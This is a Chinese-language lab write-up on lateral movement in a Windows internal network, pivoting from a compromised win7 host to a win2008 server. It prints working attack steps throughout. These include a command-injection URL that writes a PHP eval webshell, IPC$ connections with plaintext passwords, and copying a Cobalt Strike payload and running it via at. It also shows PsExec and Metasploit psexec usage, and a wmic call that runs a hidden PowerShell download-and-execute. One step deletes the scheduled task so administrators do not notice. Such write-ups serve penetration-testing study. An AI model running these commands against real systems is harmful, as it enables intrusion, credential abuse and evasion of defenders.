【内网横移方法与实验】

---

前言

在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制域环境下的全部机器。

---

实验简述

实验拓扑

本次实验环境如上图所示，win7有两个网卡，IP地址分别是：10.40.1.22(可上网），10.40.2.10（内网）；win2008服务器处于内网中，IP地址10.40.2.20，不出网；我们想要使用我们的kali主机要取得win2008的控制权，就必须先拿下win7，再做内网横移拿下win2008，这也是本次实验的目的

实验步骤

1.首先利用win7的漏洞上传webshell

目的是上传webshell取得权限后，能够上传cs制作的木马，通过运行木马取得win7的控制权

实验中利用了win7的命令执行漏洞

http://10.40.1.22/zx/system.php?a=echo "<?php  @eval($_POST[123]); ?>" >  D:\phpStudy\PHPTutorial\WWW\zx\hepeng.php

写入了hepeng.php一句话木马，然后菜刀连接，上传cs木马
然后通过在虚拟终端执行，使主机成功上线

还可以抓取win7的登录明文

至此win7便能够受我们控制了，但是我们如何控制win2008呢？
思路和这个阶段差不多，我们通过win7制作中转木马，然后想办法上传到win2008上，再执行，借助cs使win2008上线，受我们控制。

2.制作中转木马

先创建一个win7的监听器，再创建木马

再生成木马

中转木马制作完成

3.利用IPC$ && at , schtasks 计划任务

利用条件

1）没有禁用IPC$连接、139和445端口、未使用防火墙等方式来阻止IPC$。 
2）目标机器开启了相关的IPC$服务。 
3）需要目标机器的管理员账号和密码（IPC$空连接除外）。 
4）需要得知目标机器IP地址并可互相通信。

利用方式
在CS客户端对win7(10.40.2.10)会话进行操作。
对 win2008(10.4.2.20)目标主机建立共享连接，并查看目标主机共享资源。

IPC$(Internet Process Connection)
是NT2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。IPC可以通过验证用户名和密码获得相应的权限，通常在远程管理计算机和查看计算机的共享资源时使用。
通过ipc$,可以与目标及其建立连接。利用这个连接，不仅可以访问目标机器中的文件，进行上传、下载等操作，还可以在目标机器上运行其他命令，以获取目标机器的目录结构、用户列表等信息。

常用命令

net use \\<DC的IP>\ipc$ "password" /user:"username"
net use \\192.168.183.130\ipc$ "Liu78963" /user:"administrator"
net user //查看当前主机所建立的连接

开放/关闭 ipc$ 共享

net share ipc$
net share ipc$ /del

取消IPC远程连接

net use * /del /y

建立共享连接

beacon> shell net use \\10.40.2.20\ipc$ "HEpeng20001023" /user:domain\\"Administrator"

查看一下c盘目录，验证一下是否连接成功

将生成在kali主机的中转木马上传到win7,利用upload

上传之后查看一下

于是win7上有了中转木马，因为我们与内网win2008建立了共享连接，所以可以通过copy复制文件
，所以通过copy复制木马到win2008C盘

shell copy zhongzhuan.exe \\10.40.2.20\C$

上传成功，接下来就是通过远程执行木马即可使win2008上线
可选用at，或者schtasks，win2008支持at，不支持schtasks

先使用net time命令确定目标主机DC的当前时间：

net time \\10.40.2.20

再创建计划任务

存在这样的报错
需要在win7 C:\Windows\System32\drivers\etc\hosts中添加

10.40.2.20 Remotehost 

可通过cs中命令行利用echo写入，也可以在蚁剑中直接进入文件修改

beacon> shell echo 10.40.2.20 Remotehost >> C:\Windows\System32\drivers\etc\hosts

重新输入
再执行一次

shell at \\10.40.2.20 17:26 C:/zhongzhuan.exe

成功上线

查看目录

最后，我们使用完计划任务后，还需要将该计划任务删除，以免被网管理员发现

shell at \\10.40.2.20 1 /delete // 1为计划任务的ID

内网横移成功
以上介绍的是常见内网横移一般流程，利用的是CS和IPC共享连接以及at等计划任务实现

---

其他方法

1.创建Windows服务来进行横向渗透，利用 sc 命令

2.利用PsExec工具进行横向渗透

PsExec是一种轻巧的telnet替代品，可让您在其他系统上执行进程，并为控制台应用程序提供完整的交互性，而无需手动安装客户端软件。
前提条件：

1）能够获得明文密码或密码hash值(官方工具只能使用明文，第三方可以使用hash)
2）通过psexec工具的话只能在本地反弹shell，但是CS可以辅助我们使用psexec方法，远程反弹会话
3）建立的连接需要连接administrator用户，普通权限无法连接成功
4）跳板机任意权限

常用命令：

#第一种：先建立ipc$连接，在执行命令
1）net use \\192.168.89.1\ipc$ "admin!@#45" /user:administrator
2）psexec.exe -accepteula \\192.168.89.1 -s cmd.exe // 需要先有 ipc 链接 -s 以 System 权限运行,-accepteula 第一次运行不弹框
3）PsExec.exe -accepteula \\192.168.89.1 -s cmd.exe /c "whoami" //单条命令执行
#第二种：直接提供明文密码进行命令执行
1）psexec.exe -accepteula \\192.168.89.1 -u administrator -p Admin12345 -s cmd.exe
//-s 以system权限运行运程进程，获得一个system权限的交互式shell。如果不使用该参数，会获得一个连接所用用户权限的shell

实验：
首先我们需要将psexec.exe文件上传到win7跳板机，当我们获取到shell后就可以执行命令
来到psexec.exe所在目录

现在ip地址为win7跳板机IP地址
接下来执行

psexec.exe -accepteula \\10.40.2.20 -u Administrator -p HEpeng20001023 -s cmd.exe

反弹了system权限shell回来，再查看当前IP地址
发现为win2008地址，并且是system权限
我们不仅可以用PsExec得到目标主机的shell，也可以直接执行命令：

psexec.exe -accepteula \\10.40.2.20 -u Administrator -p HEpeng20001023 -s cmd.exe /c whoami // 用目标系统的cmd.exe的/c选项在目标主机上执行命令，并得到回显

可以直接回显
Tips：psexec 传递命令时不要添加双引号否则会报 “系统找不到指定的文件” 的错误。

Metasploit下的PsExec模块也可以用于渗透：

search psexec
use exploit/windows/smb/psexec           // 用psexec执行系统命令,与psexec.exe相同
use exploit/windows/smb/psexec_psh       // 使用powershell作为payload(PsExec的PowerShell版本)
auxiliary/admin/smb/psexec_command   // 在目标机器上执行系统命令exploit/windows/smb/ms17_010_psexec
set rhosts x.x.x.x
set SMBDomain god
set SMBUser xx
set SMBPass xx    // 设置明文密码或设置哈希来进行PTH
run

3.利用WMI来横向渗透

利用条件

1、WMI服务开启，端口135，默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码。

利用方式
实验拓扑和上面一样
在 CS 客户端对Win 7(10.40.1.22)会话进行操作。
使用CS生成一个WEB交互式Payload（Scripted Web Delivery）来实现无文件落地上线。

Tips：因为目标主机不出网所以需要把 http://10.40.2.117:8090/a 上的payload，复制下来并上传到win7跳板机，在跳板机开启WEB服务，使受害机下载并执行跳板机上的Payload，上线CS

下载木马并改名
再在交互界面利用upload命令上传至win7跳板机
并开启http web服务

shell python -m http.server 80

再通过wmic命令下载执行

beacon> shell wmic /node:10.40.2.20/user:Administrator /password:HEpeng20001023 process call create "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.40.2.10:8080/payload.txt'))"

win2008验证

Tips：wmic命令缺点无回显，但是可借助其他脚本(wmiexec.vbs)来实现回显功能。

其他利用

1）wmic /node:10.40.2.20 /user:Administrator /password:HEpeng20001023 process call create "cmd.exe /c net user >C:\1.txt" #工作组
2）wmic /node:10.40.2.20 /user:hacker\Administrator /password:HEpeng20001023 process call create "cmd.exe /c ipconfig >C:\1.txt" #域内

可直接执行命令，但是无法回显，写入文件中可通过ipc$连接用type命令读取

4.WMIEXEC

wmiexec是对windows自带的wmic做了一些强化，让渗透变得更容易。比较好用的在这里介绍几种。wmiexec需要提供账号密码进行远程连接，但是如果没有破解出账号和明文密码，也可以配合哈希传递或票据注入功能一起使用，先进行传递或注入，然后再使用WMIEXEC即可。
wmiexec.py
主要在从Linux像Windows进行横向渗透时使用，十分强大，可以走socks代理进入内网

python wmiexec.py administrator:Liu78963@192.168.183.130 // python wmiexec.py 用户名:密码@目标IP
wmiexec.py administrator:P@ssw0rd@192.168.20.197 "C:\Users\Administrator\Desktop\123\hp.exe" //可以执行文件
wmiexec.py administrator:P@ssw0rd@192.168.20.197 "whoami"

下载地址：
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
wmiexec.exe
利用条件：

1）获取明文密码或hash值
2）只能在本地执行
3）需要administrator用户账号，普通权限连接不成功
4）跳板机任意权限

wmiexec.exe与wmiexec.py是一样的，主要用在Windows上，命令与wmiexec.py一模一样,我们就可以在跳板机上执行。

wmiexec.exe administrator:Liu78963@192.168.183.130

5.哈希传递攻击(PTH)

详细介绍可看：
内网渗透测试:内网横向移动基础总结
内网横向移动常用方法总结
我是菜鸡

---

总结

本期主要介绍的是内网横移的流程与方法